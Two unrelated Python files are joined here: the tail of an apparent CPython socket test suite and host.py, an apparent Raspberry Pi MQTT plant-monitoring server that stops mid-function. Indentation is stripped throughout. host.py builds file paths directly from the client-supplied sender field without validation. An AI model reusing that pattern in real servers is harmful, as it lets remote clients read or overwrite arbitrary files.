with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
        # There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking sockets
# since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
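# For illustration: chunks(10, 4) yields 4, 4, 2 -- full step-sized pieces
# followed by the remainder, so the loop below writes exactly FILESIZE bytes
# in BUFSIZE-sized writes.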
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=0.01) as sock, \
file as file:
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(thread, 'Threading required for this test.')
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
host.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import paho.mqtt.client as mqtt # Import mqtt
import paho.mqtt.publish as publish # Import mqtt
from os import path # Import the path function to check if a userdata file exists or not
import json # Used to read and write userdata
import sensors # Import the sensors.py file
import time # Import time
import threading # Import thread
# import RPi.GPIO as gpio # Import GPIO --> This will not be used in this case
serverAddress = "172.20.8.47" # IP address of the RPI
serverTo = "rpi/torpi" # From client to server stream
serverFrom = "rpi/fromrpi" # From server to client stream
serverName = "Host-RPI3B+" # Emily for short
maxPlants = 7 # Maximum number of plants the user can have
maxPlantName = 15 # Longest plant name the user can have
errCausingHash = "null" # If an error occurs, this is sent back to the client who caused the error for debug
kickHash = {} # Used to keep track of each client and the number of messages they have sent
markEjection = [] # Used to keep track of offending clients
monitorInterval = 15 # How often the server completes a cleanup routine to kick clients sending too many messages
msgThreshold = 15 # If the client sends more than this many messages in monitorInterval time, kick them
# ======================================================================
# Request Tag Functions---
# ======================================================================
# def REQ_plantSensorData
#
def REQ_plantSensorData(msg):
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
try:
with open(userpath) as infile:
plants = json.load(infile)
# An error occurred while reading plant information from the user's .json file
except:
# If the requesting client has no plant data, throw an error
operationError("ERR_noPlantDataToRequest", errCausingHash, msg["sender"])
return
# Get the data from the sensors
if (msg["payload"] == "all"): # the user requested all plant data
# For every sensor of every plant, return the data for each plant at a time
for plant in plants:
# Data for any given plant
dataForPlant = []
# Parse the json sensor names as a literal array
sensorsParsed = json.loads(plant["Sensors"])
for sensor in range(len(sensorsParsed)):
try:
sensorData = sensors.readSensor(int(sensorsParsed[sensor], 16))
except:
operationError("ERR_invalidPlantSensorID", errCausingHash, msg["sender"])
return
# If the sensor ID is invalid, throw an error
if (sensorData == "ERR_invalidPlantSensorID"):
operationError("ERR_invalidPlantSensorID", errCausingHash, msg["sender"])
return
# If the data was valid, save it
sensorData["plant"] = plant["Name"]
sensorData["sensor"] = sensorsParsed[sensor]
sensorData = str(sensorData).replace(":", "--")
dataForPlant.append(sensorData)  # accumulate each sensor's reading for this plant
# Otherwise, return the data
publishOutgoingResponse("0", serverName, msg["sender"], str(dataForPlant), "RES_plantSensorData")
# end: def REQ_plantSensorData
# ======================================================================
# def REQ_numPlants
#
def REQ_numPlants(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
try:
with open(userpath) as infile:
plants = json.load(infile)
# Send the client back the number of plants
publishOutgoingResponse("0", serverName, msg["sender"], str(len(plants)), "RES_numPlants")
except:
# If the requesting client has no plant data, throw an error
operationError("ERR_noPlantDataToRequest", "null", msg["sender"])
return
# end: def REQ_numPlants
# ======================================================================
# def REQ_plantInfoOnStartup
#
def REQ_plantInfoOnStartup(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
with open(userpath) as infile:
plants = json.load(infile)
# If the requesting client has no plant data, throw an error
else:
operationError("ERR_noPlantDataToRequest", "", msg["sender"])
return
# Get the specific plant to return
plantDataToSend = plants[int(msg["payload"])]
plantDataAsStr = json.dumps(plantDataToSend)
plantDataAsStr = plantDataAsStr.replace(":", "--")
# Return the data for a single plant
publishOutgoingResponse("0", serverName, msg["sender"], plantDataAsStr, "RES_plantInfoOnStartup")
# end: def REQ_plantInfoOnStartup
# ======================================================================
# def REQ_addNewPlant
#
def REQ_addNewPlant(msg):
# Init the path of the new or existing file
userpath = "userdata/" + msg["sender"] + ".json"
userdata = msg["payload"].split("--")
# Make sure the path exists
if (path.exists(userpath)):
# First read in any existing data
try:
with open(userpath) as infile:
plants = json.load(infile)
except:
plants = []
# If the path doesn't exist create new data
else:
plants = []
# The user already has the maximum number of plants
if (len(plants) >= maxPlants):
operationError("ERR_tooManyPlants", errCausingHash, msg["sender"])
return
# The user already has a plant with this name
for i in range(len(plants)):
if (userdata[0] == plants[i]["Name"]):
operationError("ERR_plantNameTaken", errCausingHash, msg["sender"])
return
# Make sure the plant name isn't too long
if (len(userdata[0]) > maxPlantName):
operationError("ERR_plantNameTooLong", errCausingHash, msg["sender"])
return
# Init the data to save
plants.append({
"Name" : userdata[0],
"Sensors" : userdata[1]
})
# Save the data (this will create a new file if one does not already exist)
with open(userpath, "w") as outfile:
json.dump(plants, outfile)
# Print out what was saved
print("New plant added with data: " + msg["payload"] + ", for user: " + msg["sender"])
# end: def REQ_addNewPlant
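# Illustrative example (the payload layout is inferred from the split("--")
# above, not documented elsewhere): a request payload such as
#   Basil--["0x48", "0x49"]
# is stored in userdata/<sender>.json as
#   [{"Name": "Basil", "Sensors": "[\"0x48\", \"0x49\"]"}]
# where each entry in "Sensors" is a hexadecimal sensor ID string that
# REQ_plantSensorData later converts with int(sensorID, 16).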
# ======================================================================
# def REQ_deletePlant
#
def REQ_deletePlant(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Check for existing file
if (path.exists(userpath)):
with open(userpath) as infile:
plants = json.load(infile)
# If the requesting client has no plant data, throw an error
else:
operationError("ERR_noPlantDataToRequest", errCausingHash, msg["sender"])
return
# Search for and remove the desired plant
for i in range(len(plants)):
# If the plant was found, delete it
if (plants[i]["Name"] == msg["payload"]):
del plants[i]
# Save the new plant data (any not deleted plants)
with open(userpath, "w") as outfile:
json.dump(plants, outfile)
return
# If the plant was not found, throw an error
if (i >= len(plants) - 1):
operationError("ERR_cannotDeletePlant", errCausingHash, msg["sender"])
# end: def REQ_deletePlant
# ======================================================================
# def REQ_editPlant
#
def REQ_editPlant(msg):
# Make sure the user has plant data already
userpath = "userdata/" + msg["sender"] + ".json"
# Get the name of the plant to be changed and the new data
plantToChange = msg["payload"].split(",")
oldName = plantToChange[0] # Old plant name, the plant to look for
newName = plantToChange[1] # New name for that plant
# Check for existing file
if (path.exists(userpath)):
with open(userpath) as infile:
plants = json.load(infile)
# If the requesting client has no plant data, throw an error
else:
operationError("ERR_noPlantDataToRequest", errCausingHash, msg["sender"])
return
# Make sure the user isn't renaming a plant to an already existing name
for i in range(len(plants)):
# If the names are equal, the user probably pressed "save" by accident, so don't give them an error
if (newName == oldName):
return
# If a different plant than the one being changed has the newName, throw an error
if (plants[i]["Name"] == newName):
operationError("ERR_plantNameTaken", errCausingHash, msg["sender"])
return
# Search for and change the desired plant
for i in range(len(plants)):
# If the plant was found, edit it accordingly
if (plants[i]["Name"] == oldName):
# If everything is good, change the name
plants[i]["Name"] = newName
# Save the new plant data (any not deleted plants)
with open(userpath, "w") as outfile:
json.dump(plants, outfile)
return
# If the plant was not found, throw an error
if (i >= len(plants) - 1):
